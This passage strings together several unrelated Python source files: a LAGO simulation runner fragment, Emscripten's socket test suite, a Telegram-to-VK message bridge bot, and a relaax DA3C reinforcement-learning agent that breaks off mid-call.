#def _producer(self, catcodename, arti_params):
# pass
def _consumer(self, catcodename, onedata_path, arti_params_dict):
while True:
(filecode, task) = self._q.get()
try:
self._run_check_and_copy_results(catcodename, filecode, task,
onedata_path, arti_params_dict)
print('Completed NRUN: ' + str(filecode) + ' ' + task)
self._q.task_done()
except Exception as inst:
self._q.put((filecode, task))
# we have to substract 1 to queue lenght because q.put
# always add 1 to lenght but really we are re-queing and
# size remains the same
self._q.task_done()
# ---- END: producer/consumer of executions ---------
def _reconstruct_arti_args_from_dict(self, args_dict):
# reconstruct arguments to launch ARTI by command line
s = ''
for (key, value) in args_dict.items():
if value is not None:
s += ' -'+key
if value is not True:
s += ' '+str(value)
return s
def _add_private_info_to_dict(self, args_dict):
# Now I can add extra info (without changing s)
#
# if 'v' is defined, is because CORSIKA is used
if 'v' in args_dict :
args_dict['priv_corsikacommit'] = mdUtils.get_git_commit('/opt/lago-corsika-' + args_dict['v'])
args_dict['priv_articommit'] = mdUtils.get_git_commit(os.environ['LAGO_ARTI'])
args_dict['priv_odsimcommit'] = mdUtils.get_git_commit(os.environ['LAGO_ONEDATASIM'])
# WARNING temporarily the main HANDLE ref will be the current OneProvider
handleaux='https://' + os.environ['ONECLIENT_PROVIDER_HOST']
args_dict['priv_handlejsonapi'] = handleaux + '/api/v3/oneprovider/metadata/json'
args_dict['priv_handlecdmi'] = handleaux + '/cdmi'
# dcat:accessURL corresponds to the landing page and it can only be set when the
# data will be officially published, thus temporarily we firstly use a dummy url
args_dict['priv_landingpage'] = 'https://datahub.egi.eu/not_published_yet'
return args_dict
# ---- MAIN PROGRAM ---------
def run(self):
main_start_date = mdUtils.xsd_dateTime()
(catcodename, arti_params_dict, arti_params_json_md) = self._get_sys_args()
arti_params = self._reconstruct_arti_args_from_dict(arti_params_dict)
arti_params_dict = self._add_private_info_to_dict(arti_params_dict)
# arti_params_dict = mdUtils.add_private_info_to_dict(arti_params_dict)
onedata_path = '/mnt/datahub.egi.eu/LAGOsim'
# onedata_path = '/mnt/datahub.egi.eu/test8/LAGOSIM'
catalog_path = onedata_path + '/' + catcodename
print(arti_params, arti_params_dict, arti_params_json_md)
try:
# mount OneData (fails in python although you wait forever):
# removed, currently in Dockerfile.
# cmd = "oneclient --force-proxy-io /mnt"
# osUtils.run_Popen(cmd, timeout=10)
if os.path.exists(onedata_path):
if not os.path.exists(catalog_path):
os.mkdir(catalog_path, mode=0o755) # this should change to 0700
os.mkdir(catalog_path + '/.metadata', mode=0o755) # idem to 0700
md = mdUtils.get_first_catalog_metadata_json(catcodename,
arti_params_dict)
md = mdUtils.add_json(md, arti_params_json_md)
# osUtils.write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
# json.dumps(md))
osUtils._write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
json.dumps(md))
xattr.setxattr(catalog_path, 'onedata_json', json.dumps(md))
else:
if not os.access(catalog_path, os.W_OK):
# It is needed managing this with some kind of versioning
# or completion of failed simulations
raise Exception("Simulation blocked by other user in" + \
" OneData: " + catalog_path)
else:
raise Exception("OneData not mounted")
except Exception as inst:
raise inst
for i in range(int(arti_params_dict["j"])): # processors
t = Thread(target=self._consumer, args=(catcodename, onedata_path,
arti_params_dict))
t.daemon = True
t.start()
q_aux = self._producer(catcodename, arti_params)
for i in q_aux.queue:self._q.put(i)
t = Thread(target=self._consumer_onedata_cp, args=(onedata_path,))
t.daemon = True
t.start()
self._q.join()
self._q_onedata.join()
md = json.loads(xattr.getxattr(catalog_path, 'onedata_json'))
# I'm replacing, not adding datasets.
md['dataset'] = ["/" + catcodename + "/" + s for s in
os.listdir(catalog_path) if not s.startswith('.')]
md = mdUtils.add_json(md, json.loads(mdUtils.get_catalog_metadata_activity(main_start_date,
mdUtils.xsd_dateTime(),
catcodename,
arti_params_dict)))
# osUtils.write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
# json.dumps(md))
osUtils._write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
json.dumps(md))
xattr.setxattr(catalog_path, 'onedata_json', json.dumps(md))
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
from subprocess import Popen, PIPE
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from common import BrowserCore, no_windows, create_file, test_file, read_file
from tools import shared, config, utils
from tools.shared import PYTHON, EMCC, path_from_root, WINDOWS, run_process, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(config.NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.terminate() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, test_file(self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(config.NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', test_file(self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(config.NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(config.NODE_JS + [test_file('websocket', 'nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, test_file('websocket', 'tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super().setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + test_file('sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-sUSE_SDL=2', '-sUSE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-sUSE_SDL=2', '-sUSE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
sockets_include = '-I' + test_file('sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + test_file('sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = test_file('sockets', 'test_sockets_echo_client.c')
input = read_file(input_filename)
create_file('test_sockets_echo_bigdata.c', input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message))
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest('test_sockets_echo_bigdata.c', expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram])
@no_windows('This test is Unix-specific.')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest_exit(os.path.join('sockets', 'test_sockets_partial_client.c'), assert_returncode=165, args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + test_file('sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(test_file('third_party', 'enet'), 'enet')
with utils.chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure', '--disable-shared'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
if config.NODE_JS not in config.JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + test_file('sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', test_file('sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-sSOCKET_DEBUG', '-sWEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
# Test against a Websockified server with runtime WebSocket configuration. We specify both url and subprotocol.
# In this test we have *deliberately* used the wrong port '-DSOCKK=12345' to configure the echo_client.c, so
# the connection would fail without us specifying a valid WebSocket URL in the configuration.
print("\nTesting runtime WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59168)
]:
with harness:
open(os.path.join(self.get_dir(), 'websocket_pre.js'), 'w').write('''
var Module = {
websocket: {
url: 'ws://localhost:59168/testA/testB',
subprotocol: 'text, base64, binary',
}
};
''')
self.run_process([EMCC, '-Werror', test_file('sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '--pre-js', 'websocket_pre.js', '-sSOCKET_DEBUG', '-DSOCKK=12345'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained('connect: ws://localhost:59168/testA/testB, text,base64,binary', out)
# Test Emscripten WebSockets API to send and receive text and binary messages against an echo server.
# N.B. running this test requires 'npm install ws' in Emscripten root directory
def test_websocket_send(self):
with NodeJsWebSocketEchoServerProcess():
self.btest(test_file('websocket', 'test_websocket_send.c'), expected='101', args=['-lwebsocket', '-sNO_EXIT_RUNTIME', '-sWEBSOCKET_DEBUG'])
# Test that native POSIX sockets API can be used by proxying calls to an intermediate WebSockets -> POSIX sockets bridge server
def test_posix_proxy_sockets(self):
# Build the websocket bridge server
self.run_process(['cmake', path_from_root('tools/websocket_to_posix_proxy')])
self.run_process(['cmake', '--build', '.'])
if os.name == 'nt': # This is not quite exact, instead of "isWindows()" this should be "If CMake defaults to building with Visual Studio", but there is no good check for that, so assume Windows==VS.
proxy_server = os.path.join(self.get_dir(), 'Debug', 'websocket_to_posix_proxy.exe')
else:
proxy_server = os.path.join(self.get_dir(), 'websocket_to_posix_proxy')
with BackgroundServerProcess([proxy_server, '8080']):
with PythonTcpEchoServerProcess('7777'):
# Build and run the TCP echo client program with Emscripten
self.btest(test_file('websocket', 'tcp_echo_client.cpp'), expected='101', args=['-lwebsocket', '-sPROXY_POSIX_SOCKETS', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
|
funcs.py
|
import telebot, requests, threading, asyncio, json, io, aiohttp, traceback, lang
from vk.exceptions import *
from vk import Session, API
from PIL import Image
from settings import SETTINGS
from sql import SQL
#Database ialise
db = SQL(SETTINGS().DB_NAME)
tg = telebot.TeleBot(SETTINGS().TOKEN)
loop = asyncio.get_event_loop()
async def upload_photo(encoded_image, upload_url):
data = aiohttp.FormData()
data.add_field('photo',
encoded_image,
filename='picture.png',
content_type='multipart/form-data')
async with aiohttp.ClientSession() as sess:
async with sess.post(upload_url, data=data) as resp:
result = json.loads(await resp.text())
data = dict(photo=result['photo'], hash=result['hash'], server=result['server'])
return data
def InitUsers(data):
for i in data:
threading.Thread(target=AddUserToListen, args=(i[0], i[1])).start()
print('Загрузка пользователей прошла успешно!')
def AddUserToListen(tl_id, access_key):
session = Session(access_token=access_key)
vk = API(session)
key = vk.messages.getLongPollServer(v='5.74')['key']
server = vk.messages.getLongPollServer(v='5.74')['server']
ts = vk.messages.getLongPollServer(v='5.74')['ts']
while True:
r = requests.get('https://'+str(server)+'?act=a_check&key='+str(key)+'&ts='+str(ts)+'&wait=60&mode=2&version=2&v=5.74')
ts = r.json()['ts']
upd = r.json()['updates']
for i in range(len(upd)):
if upd[i][0]==4 and upd[i][2]!=51 and upd[i][2]!=19 and upd[i][2]!=35 and upd[i][2]!=547 and upd[i][2]!=563 and upd[i][2]!=3:
user = vk.users.get(user_ids=upd[i][3],fields='sex',v='5.74')[0]
msg_text = str(upd[i][5])
if upd[i][3] != db.get_data(tl_id)[4]:
tg.send_message(chat_id=tl_id, disable_web_page_preview=True, parse_mode='HTML', text=lang.ru.UserReceiveHeader(user))
tg.send_message(chat_id=tl_id, disable_web_page_preview=True, parse_mode='HTML', text=msg_text)
msg = vk.messages.getById(message_ids=upd[i][1],v='5.74')['items'][0]
if msg.get('attachments') != None:
for a in msg['attachments']:
if a['type']=='photo':
img = a['photo']['photo_604']
tg.send_photo(chat_id=tl_id, photo=img)
elif a['type']=='audio':
tg.send_audio(chat_id=tl_id, audio=a['audio']['url'])
elif a['type']=='doc':
tg.send_document(chat_id=tl_id, data=a['doc']['url'])
db.set_sender(tl_id, upd[i][3])
def SendMsg(tl_id, access_key, reciever_id, msg):
session = Session(access_token=access_key)
vk = API(session)
try:
vk.messages.send(user_id=int(reciever_id), message=msg,v='5.74')
except:
try:
vk.messages.send(domain=reciever_id, message=msg,v='5.74')
except Exception as e:
tg.send_message(chat_id=tl_id, text='Вернитесь в меню и проверьте правильность введённого ID.')
def SendImg(tl_id, access_key, reciever_id, img):
img = Image.open(io.BytesIO(img))
buffer = io.BytesIO()
img.save(buffer, format='png')
buffer.seek(0)
session = Session(access_token=access_key)
vk = API(session)
r = loop.run_until_complete(upload_photo(buffer, vk.photos.getMessagesUploadServer(v='5.74')['upload_url']))
final_image = vk.photos.saveMessagesPhoto(photo=r['photo'], server=r['server'], hash=r['hash'],v='5.74')
try:
vk.messages.send(user_id=int(reciever_id), message=' ', attachment='photo'+str(final_image[0]['owner_id'])+'_'+str(final_image[0]['id']),v='5.74')
except:
try:
vk.messages.send(domain=reciever_id, message='', attachment='photo'+str(final_image[0]['owner_id'])+'_'+str(final_image[0]['id']),v='5.74')
except:
tg.send_message(chat_id=tl_id, text='Вернитесь в меню и проверьте правильность введённого ID.')
def SendDoc(access_key, reciever_id, doc):
session = Session(access_token=access_key)
vk = API(session)
url = vk.docs.getUploadServer()['upload_url']
r = requests.post(url, files={'file': doc})
print(r.json())
print(url)
|
agent.py
|
from __future__ import absolute_import
from builtins import object
import logging
import numpy as np
import threading
import six.moves.queue as queue
from relaax.common import profiling
from relaax.server.common import session
from relaax.common.algorithms.lib import utils
from relaax.common.algorithms.lib import observation
from .lib.da3c_replay_buffer import DA3CReplayBuffer
from . import da3c_config
from . import da3c_model
logger = logging.getLogger(__name__)
profiler = profiling.get_profiler(__name__)
M = False
# DA3CAgent implements training regime for DA3C algorithm
# If exploit on init set to True, agent will run in exploitation regime:
# stop updating shared parameters and at the end of every episode load
# new policy parameters from PS
class Agent(object):
def __init__(self, parameter_server, metrics):
self.ps = parameter_server
self.metrics = metrics
self.exploit = False
self.session = None
self.lstm_zero_state = None
self.lstm_state = self.initial_lstm_state = None
self.observation = None
self.last_action = None
self.last_value = None
self.last_probs = None
self.queue = None
self.icm_observation = None
self.replay_buffer = None
self.terminal = False
self.discounted_reward = None
self.filter = None
self.agent_weights_id = 0
# environment is ready and
# waiting for agent to initialize
def init(self, exploit=False):
self.exploit = exploit
model = da3c_model.AgentModel()
self.session = session.Session(model)
if da3c_config.config.use_lstm:
self.lstm_state = self.initial_lstm_state = self.lstm_zero_state = model.lstm_zero_state
if da3c_config.config.lstm_type.lower() == 'dilated':
self.session.op_lstm_reset_timestep()
self.observation = observation.Observation(da3c_config.config.input.history)
self.last_action = None
self.last_value = None
self.last_probs = None
if da3c_config.config.hogwild and not da3c_config.config.use_icm:
self.queue = queue.Queue(10)
threading.Thread(target=self.execute_tasks).start()
self.receive_experience()
else:
self.queue = None
if da3c_config.config.use_icm:
self.icm_observation = observation.Observation(da3c_config.config.input.history)
if da3c_config.config.use_filter:
self.filter = utils.ZFilter(da3c_config.config.input.shape)
self.replay_buffer = DA3CReplayBuffer(self)
return True
# Callback methods
def begin(self):
self.do_task(self.receive_experience)
if da3c_config.config.use_lstm:
self.initial_lstm_state = self.lstm_state
self.get_action_and_value()
def end(self, experience):
if not self.exploit:
self.do_task(lambda: self.send_experience(experience))
@profiler.wrap
def reset(self):
if da3c_config.config.use_lstm:
self.initial_lstm_state = self.lstm_state = self.lstm_zero_state
if da3c_config.config.lstm_type.lower() == 'dilated':
self.session.op_lstm_reset_timestep()
# End callback methods
@profiler.wrap
def step(self, reward, state, terminal):
if da3c_config.config.use_filter and not terminal:
state = self.filter(state)
if reward is not None:
if da3c_config.config.use_icm and not terminal:
int_reward = self.get_intrinsic_reward(state)
self.metrics.scalar('intrinsic_reward', int_reward)
reward += int_reward
reward = np.tanh(reward)
self.push_experience(reward, terminal)
else:
if da3c_config.config.use_icm:
self.icm_observation.add_state(None)
self.icm_observation.add_state(state)
if terminal:
self.observation.add_state(None)
else:
assert state is not None
self.metrics.histogram('state', state)
self.observation.add_state(state)
self.terminal = terminal
assert self.last_action is None
assert self.last_value is None
assert self.last_probs is None
self.get_action_and_value()
@property
def experience(self):
return self.replay_buffer.experience
# environment generated new state and reward
# and asking agent for an action for this state
@profiler.wrap
def update(self, reward, state, terminal):
self.check_state_shape(state)
# replace empty state with constant one
if list(np.asarray(state).shape) == [0]:
state = [0]
self.step(reward, state, terminal)
return self.last_action
@staticmethod
def check_state_shape(state):
if state is None:
return
expected_shape = list(da3c_config.options.algorithm.input.shape)
actual_shape = list(np.asarray(state).shape)
if actual_shape != expected_shape:
logger.warning('State shape %s does not match to expected one %s.', repr(actual_shape),
repr(expected_shape))
#########################
# From batch
def execute_tasks(self):
while True:
task = self.queue.get()
task()
def do_task(self, f):
if self.queue is None:
f()
else:
self.queue.put(f)
@profiler.wrap
def send_experience(self, experience):
self.apply_gradients(self.compute_gradients(experience), experience['reward'])
if da3c_config.config.use_icm:
self.ps.session.op_icm_apply_gradients(gradients=self.compute_icm_gradients(experience))
@profiler.wrap
def receive_experience(self):
self.ps.session.op_check_weights()
weights, self.agent_weights_id = self.ps.session.op_get_weights()
# print('w_id', self.agent_weights_id)
if M:
for i, w in enumerate(utils.Utils.flatten(weights)):
self.metrics.histogram('weight_%d' % i, w)
self.session.op_assign_weights(weights=weights)
if da3c_config.config.use_icm:
self.session.op_icm_assign_weights(weights=self.ps.session.op_icm_get_weights())
def push_experience(self, reward, terminal):
assert self.observation.queue is not None
assert self.last_action is not None
assert self.last_value is not None
assert self.last_probs is not None
self.replay_buffer.step(
terminal,
reward=reward,
state=self.observation.queue,
action=self.last_action,
value=self.last_value,
probs=self.last_probs
)
self.last_action = None
self.last_value = None
self.last_probs = None
def get_action_and_value(self):
if self.observation.queue is None:
self.last_action = None
self.last_value = None
self.last_probs = None
else:
self.last_action, self.last_value = self.get_action_and_value_from_network()
assert self.last_action is not None
assert self.last_value is not None
assert self.last_probs is not None
def get_action_and_value_from_network(self):
if da3c_config.config.use_lstm:
action, value, lstm_state = \
self.session.op_get_action_value_and_lstm_state(state=[self.observation.queue],
lstm_state=self.lstm_state,
lstm_step=[1])
condition = self.experience is not None and (len(self.experience) ==
da3c_config.config.batch_size or self.terminal)
if not condition:
self.lstm_state = lstm_state
else:
action, value = self.session.op_get_action_and_value(state=[self.observation.queue])
value, = value
if len(action) == 1:
if M:
self.metrics.histogram('action', action)
self.last_probs, = action
return utils.choose_action_descrete(self.last_probs), value
mu, sigma2 = action
self.last_probs = mu
if M:
self.metrics.histogram('mu', mu)
self.metrics.histogram('sigma2', sigma2)
return utils.choose_action_continuous(mu, sigma2, da3c_config.config.output.action_low,
da3c_config.config.output.action_high), value
def get_intrinsic_reward(self, state):
self.icm_observation.add_state(state)
if state is not None:
icm_input = [self.observation.queue, self.icm_observation.queue]
return self.session.op_get_intrinsic_reward(state=icm_input, probs=[self.last_probs])[0]
return 0
def compute_gradients(self, experience):
r = 0.0
if self.last_value is not None:
r = self.last_value
reward = experience['reward']
gamma = da3c_config.config.rewards_gamma
# compute discounted rewards
self.discounted_reward = utils.discount(np.asarray(reward + [r], dtype=np.float32), gamma)[:-1]
# compute advantage wrt rewards and critic values
forward_values = np.asarray(experience['value'][1:] + [r]) * gamma
rewards = np.asarray(reward) + forward_values - np.asarray(experience['value'])
advantage = utils.discount(rewards, gamma * da3c_config.config.gae_lambda,
normalize=da3c_config.config.norm_adv)
feeds = dict(state=experience['state'], action=experience['action'],
advantage=advantage, discounted_reward=self.discounted_reward)
if da3c_config.config.use_lstm:
feeds.update(dict(lstm_state=self.initial_lstm_state, lstm_step=[len(reward)]))
gradients, summaries = self.session.op_compute_gradients_and_summaries(**feeds)
self.metrics.summary(summaries)
return gradients
def compute_icm_gradients(self, experience):
states, icm_states = experience['state'], []
for i in range(len(states) - 1):
icm_states.extend((states[i], states[i + 1]))
icm_states.extend((states[-1], self.icm_observation.queue))
return self.session.op_compute_icm_gradients(state=icm_states,
action=experience['action'],
probs=experience['probs'])
def apply_gradients(self, gradients, rewards):
experience_size = len(rewards)
if M:
for i, g in enumerate(utils.Utils.flatten(gradients)):
self.metrics.histogram('gradients_%d' % i, g)
# self.ps.session.op_apply_gradients(gradients=gradients, increment=experience_size)
self.ps.session.op_submit_gradients(gradients=gradients, step_inc=experience_size,
